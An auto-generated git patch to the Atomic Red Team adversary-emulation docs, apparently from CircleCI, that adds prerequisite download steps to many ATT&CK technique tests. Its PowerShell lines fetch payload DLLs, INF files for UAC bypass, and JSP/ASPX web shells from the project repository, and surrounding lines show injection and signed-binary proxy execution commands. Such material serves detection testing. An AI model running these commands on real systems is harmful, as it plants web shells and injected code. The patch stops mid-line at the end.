From cdb4000e205cf793a2e151fdaa7085e631e0b4f9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 10 Mar 2020 23:03:32 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1010/T1010.md | 4 +- atomics/T1016/T1016.md | 1 + atomics/T1036/T1036.md | 14 +- atomics/T1050/T1050.md | 24 ++ atomics/T1055/T1055.md | 12 + atomics/T1085/T1085.md | 48 ++++ atomics/T1100/T1100.md | 14 ++ atomics/T1117/T1117.md | 24 ++ atomics/T1118/T1118.md | 24 ++ atomics/T1121/T1121.md | 24 ++ atomics/T1127/T1127.md | 12 + atomics/T1138/T1138.md | 12 + atomics/T1174/T1174.md | 11 + atomics/T1179/T1179.md | 12 + atomics/T1191/T1191.md | 24 ++ atomics/T1196/T1196.md | 12 + atomics/T1218/T1218.md | 71 ++++++ atomics/T1220/T1220.md | 34 +++ atomics/T1223/T1223.md | 12 + atomics/T1500/T1500.md | 14 +- atomics/T1502/T1502.md | 14 +- atomics/index.yaml | 484 ++++++++++++++++++++++++++++++++++++++++- 22 files changed, 886 insertions(+), 15 deletions(-) diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index 797904b9..52d3187c 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -20,7 +20,6 @@ Compiles and executes C# code to list main window titles associated with each pr #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| input_url | URL to source code in Atomic-Red-Team git repository | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs| | input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs| | output_file_name | Name of output binary | string | $env:TEMP\T1010.exe| @@ -45,7 +44,8 @@ if (Test-Path #{input_source_code}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ``` -Invoke-WebRequest "#{input_URL}" -OutFile "#{input_source_code}" +New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" ``` diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 8ae7d183..34293e98 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -167,6 +167,7 @@ if (Test-Path "#{port_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ``` +New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" ``` diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index b86c68db..dd3b76b8 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -169,7 +169,7 @@ Copies an exe, renames it as a windows exe, and launches it to masquerade as a r #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| inputfile | path of file to copy | path | $PathToAtomicsFolder\T1036\bin\t1036.exe| +| inputfile | path of file to copy | path | PathToAtomicsFolder\T1036\bin\t1036.exe| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| @@ -186,6 +186,18 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` +#### Dependencies: Run with `powershell`! +##### Description: Exe file to copy must exist on disk at specified location (#{inputfile}) +##### Check Prereq Commands: +``` +if (Test-Path #{inputfile}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}" +``` + diff --git a/atomics/T1050/T1050.md b/atomics/T1050/T1050.md index f05cdab9..8f10bf5c 100644 --- a/atomics/T1050/T1050.md +++ b/atomics/T1050/T1050.md @@ -39,6 +39,18 @@ sc.exe delete #{service_name} ``` +#### Dependencies: Run with `powershell`! +##### Description: Service binary must exist on disk at specified location (#{binary_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{binary_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" +``` + @@ -72,6 +84,18 @@ catch {} ``` +#### Dependencies: Run with `powershell`! +##### Description: Service binary must exist on disk at specified location (#{binary_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{binary_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" +``` + diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 93223747..26f22c3a 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -61,6 +61,18 @@ mavinject $mypid /INJECTRUNNING #{dll_payload} +#### Dependencies: Run with `powershell`! +##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" +``` + diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md index 42496387..4a6edd99 100644 --- a/atomics/T1085/T1085.md +++ b/atomics/T1085/T1085.md @@ -96,6 +96,18 @@ rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Singl +#### Dependencies: Run with `powershell`! +##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" +``` + @@ -123,6 +135,18 @@ rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Sin +#### Dependencies: Run with `powershell`! +##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" +``` + @@ -150,6 +174,18 @@ rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf +#### Dependencies: Run with `powershell`! +##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" +``` + @@ -177,6 +213,18 @@ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execu +#### Dependencies: Run with `powershell`! +##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" +``` + diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md index b6767f44..930537fc 100644 --- a/atomics/T1100/T1100.md +++ b/atomics/T1100/T1100.md @@ -37,6 +37,20 @@ del #{web_shell_path} ``` +#### Dependencies: Run with `powershell`! +##### Description: Web shell must exist on disk at specified location (#{web_shells}) +##### Check Prereq Commands: +``` +if (Test-Path #{web_shells}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" +``` + diff --git a/atomics/T1117/T1117.md b/atomics/T1117/T1117.md index 2f4fc8ba..7d9152c9 100644 --- a/atomics/T1117/T1117.md +++ b/atomics/T1117/T1117.md @@ -38,6 +38,18 @@ regsvr32.exe /s /u /i:#{filename} scrobj.dll +#### Dependencies: Run with `powershell`! +##### Description: Regsvr32.exe must exist on disk at specified location (#{filename}) +##### Check Prereq Commands: +``` +if (Test-Path #{filename}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/RegSvr32.sct" -OutFile "#{filename}" +``` + @@ -88,6 +100,18 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr +#### Dependencies: Run with `powershell`! +##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" +``` + diff --git a/atomics/T1118/T1118.md b/atomics/T1118/T1118.md index 3917505a..2ed8e2ae 100644 --- a/atomics/T1118/T1118.md +++ b/atomics/T1118/T1118.md @@ -34,6 +34,18 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToCo +#### Dependencies: Run with `powershell`! +##### Description: Source code must exist on disk at specified location (#{source}) +##### Check Prereq Commands: +``` +if (Test-Path #{source}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" +``` + @@ -61,6 +73,18 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename} +#### Dependencies: Run with `powershell`! +##### Description: Source code must exist on disk at specified location (#{source}) +##### Check Prereq Commands: +``` +if (Test-Path #{source}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" +``` + diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md index ab585def..bf26e69f 100644 --- a/atomics/T1121/T1121.md +++ b/atomics/T1121/T1121.md @@ -38,6 +38,18 @@ del #{file_name} ``` +#### Dependencies: Run with `powershell`! +##### Description: The CSharp source file must exist on disk at specified location (#{source_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{source_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" +``` + @@ -73,6 +85,18 @@ del key.snk >$null 2>&1 ``` +#### Dependencies: Run with `powershell`! +##### Description: The CSharp source file must exist on disk at specified location (#{source_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{source_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" +``` + diff --git a/atomics/T1127/T1127.md b/atomics/T1127/T1127.md index ca8e8057..bf9b1373 100644 --- a/atomics/T1127/T1127.md +++ b/atomics/T1127/T1127.md @@ -60,6 +60,18 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} +#### Dependencies: Run with `powershell`! +##### Description: Project file must exist on disk at specified location (#{filename}) +##### Check Prereq Commands: +``` +if (Test-Path #{filename}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#{filename}" +``` + diff --git a/atomics/T1138/T1138.md b/atomics/T1138/T1138.md index 20a7c968..e19aaf40 100644 --- a/atomics/T1138/T1138.md +++ b/atomics/T1138/T1138.md @@ -49,6 +49,18 @@ sdbinst.exe -u #{file_path} +#### Dependencies: Run with `powershell`! +##### Description: Shim database file must exist on disk at specified location (#{file_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{file_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/src/AtomicShimx86.sdb" -OutFile "#{file_path}" +``` + diff --git a/atomics/T1174/T1174.md b/atomics/T1174/T1174.md index fdedf382..5537ce3a 100644 --- a/atomics/T1174/T1174.md +++ b/atomics/T1174/T1174.md @@ -37,6 +37,17 @@ Restart-Computer -Confirm +#### Dependencies: Run with `powershell`! +##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) +##### Check Prereq Commands: +``` +if (Test-Path #{input_dll}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +Write-Host "You must provide your own password filter dll" +``` + diff --git a/atomics/T1179/T1179.md b/atomics/T1179/T1179.md index 22945162..0dd4ef7d 100644 --- a/atomics/T1179/T1179.md +++ b/atomics/T1179/T1179.md @@ -42,6 +42,18 @@ curl #{server_name} +#### Dependencies: Run with `powershell`! +##### Description: T1179x64.dll must exist on disk at specified location (#{file_name}) +##### Check Prereq Commands: +``` +if (Test-Path #{file_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}" +``` + diff --git a/atomics/T1191/T1191.md b/atomics/T1191/T1191.md index ea4d0cda..8d2a53b2 100644 --- a/atomics/T1191/T1191.md +++ b/atomics/T1191/T1191.md @@ -34,6 +34,18 @@ cmstp.exe /s #{inf_file_path} +#### Dependencies: Run with `powershell`! +##### Description: INF file must exist on disk at specified location (#{inf_file_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191.inf" -OutFile "#{inf_file_path}" +``` + @@ -59,6 +71,18 @@ cmstp.exe /s #{inf_file_uac} /au +#### Dependencies: Run with `powershell`! +##### Description: INF file must exist on disk at specified location (#{inf_file_uac}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191_uacbypass.inf" -OutFile "#{inf_file_uac}" +``` + diff --git a/atomics/T1196/T1196.md b/atomics/T1196/T1196.md index c65119b5..7a46db33 100644 --- a/atomics/T1196/T1196.md +++ b/atomics/T1196/T1196.md @@ -32,6 +32,18 @@ control.exe #{cpl_file_path} +#### Dependencies: Run with `powershell`! +##### Description: Cpl file must exist on disk at specified location (#{cpl_file_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1196/bin/calc.cpl" -OutFile "#{cpl_file_path}" +``` + diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 371adf2a..79d64c6b 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -66,6 +66,18 @@ mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} +#### Dependencies: Run with `powershell`! +##### Description: T1218.dll must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" +``` + @@ -116,6 +128,18 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} +#### Dependencies: Run with `powershell`! +##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" +``` + @@ -141,6 +165,17 @@ msiexec.exe /q /i "#{msi_payload}" +#### Dependencies: Run with `powershell`! +##### Description: T1218.msi must exist on disk at specified location (#{msi_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{msi_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +Write-Host "You must provide your own MSI" +``` + @@ -191,6 +226,18 @@ msiexec.exe /y "#{dll_payload}" +#### Dependencies: Run with `powershell`! +##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" +``` + @@ -216,6 +263,18 @@ odbcconf.exe /S /A {REGSVR "#{dll_payload}"} +#### Dependencies: Run with `powershell`! +##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" +``` + @@ -243,6 +302,18 @@ InfDefaultInstall.exe #{inf_to_execute} +#### Dependencies: Run with `powershell`! +##### Description: INF file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" +``` + diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index b17a7a81..c713f62d 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -50,6 +50,28 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} +#### Dependencies: Run with `powershell`! +##### Description: XML file must exist on disk at specified location (#{xmlfile}) +##### Check Prereq Commands: +``` +if (Test-Path #{xmlfile}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" +``` +##### Description: XSL file must exist on disk at specified location (#{xslfile}) +##### Check Prereq Commands: +``` +if (Test-Path #{xslfile}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" +``` + @@ -102,6 +124,18 @@ wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file} +#### Dependencies: Run with `powershell`! +##### Description: XSL file must exist on disk at specified location (#{local_xsl_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" +``` + diff --git a/atomics/T1223/T1223.md b/atomics/T1223/T1223.md index 0b21037d..abdc0ac7 100644 --- a/atomics/T1223/T1223.md +++ b/atomics/T1223/T1223.md @@ -32,6 +32,18 @@ hh.exe #{local_chm_file} +#### Dependencies: Run with `powershell`! +##### Description: The payload must exist on disk at specified location (#{local_chm_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1223/src/T1223.chm" -OutFile "#{local_chm_file}" +``` + diff --git a/atomics/T1500/T1500.md b/atomics/T1500/T1500.md index 857dc601..f229030c 100644 --- a/atomics/T1500/T1500.md +++ b/atomics/T1500/T1500.md @@ -21,7 +21,7 @@ Compile C# code using csc.exe binary used by .NET #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | file | $PathToAtomicsFolder\T1500\src\calc.cs| +| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | file | PathToAtomicsFolder\T1500\src\calc.cs| | output_file | Output compiled binary | file | C:\Windows\Temp\T1500.exe| @@ -36,6 +36,18 @@ del #{output_file} ``` +#### Dependencies: Run with `powershell`! +##### Description: C# file must exist on disk at specified location (#{input_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{input_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1500/src/calc.cs" -OutFile "#{input_file}" +``` + diff --git a/atomics/T1502/T1502.md b/atomics/T1502/T1502.md index 571cc42f..dc7c697b 100644 --- a/atomics/T1502/T1502.md +++ b/atomics/T1502/T1502.md @@ -24,7 +24,7 @@ Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/ | Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_process_name | Name of the parent process | string | explorer| -| dll_path | Path of the dll to inject | string | $PathToAtomicsFolder\T1502\bin\calc.dll| +| dll_path | Path of the dll to inject | string | PathToAtomicsFolder\T1502\bin\calc.dll| | dll_process_name | Name of the created process from the injected dll | string | calculator| | spawnto_process_path | Path of the process to spawn | string | C:\Program Files\Internet Explorer\iexplore.exe| | spawnto_process_name | Name of the process to spawn | string | iexplore| @@ -44,6 +44,18 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore ``` +#### Dependencies: Run with `powershell`! +##### Description: DLL to inject must exist on disk at specified location (#{dll_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1502/bin/calc.dll" -OutFile "#{dll_path}" +``` + diff --git a/atomics/index.yaml b/atomics/index.yaml index 0b3278c1..92eebc52 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -626,6 +626,13 @@ persistence: description: Path to the shim databaase file type: String default: PathToAtomicsFolder\T1138\src\AtomicShimx86.sdb + dependency_executor_name: powershell + dependencies: + - description: Shim database file must exist on disk at specified location (#{file_path}) + prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/src/AtomicShimx86.sdb" -OutFile "#{file_path}" executor: name: command_prompt elevation_required: true @@ -1874,6 +1881,13 @@ persistence: description: TLS Server To Test Get Request type: Url default: https://www.example.com + dependency_executor_name: powershell + dependencies: + - description: T1179x64.dll must exist on disk at specified location (#{file_name}) + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}" executor: name: powershell elevation_required: true @@ -3087,6 +3101,13 @@ persistence: description: Name of the Service type: String default: AtomicTestService + dependency_executor_name: powershell + dependencies: + - description: Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: command_prompt elevation_required: true @@ -3111,6 +3132,13 @@ persistence: description: Name of the Service type: String default: AtomicTestService + dependency_executor_name: powershell + dependencies: + - description: Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: powershell elevation_required: true @@ -4925,6 +4953,15 @@ persistence: description: Path of Web Shell type: path default: PathToAtomicsFolder\T1100\src\ + dependency_executor_name: powershell + dependencies: + - description: Web shell must exist on disk at specified location (#{web_shells}) + prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" executor: name: command_prompt command: 'xcopy #{web_shells} #{web_shell_path} @@ -5935,6 +5972,13 @@ defense-evasion: description: Path to the INF file type: path default: PathToAtomicsFolder\T1191\src\T1191.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_file_path}) + prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191.inf" -OutFile "#{inf_file_path}" executor: name: command_prompt elevation_required: false @@ -5953,6 +5997,13 @@ defense-evasion: description: Path to the INF file type: path default: PathToAtomicsFolder\T1191\src\T1191_uacbypass.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_file_uac}) + prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null + Invoke-WebRequest 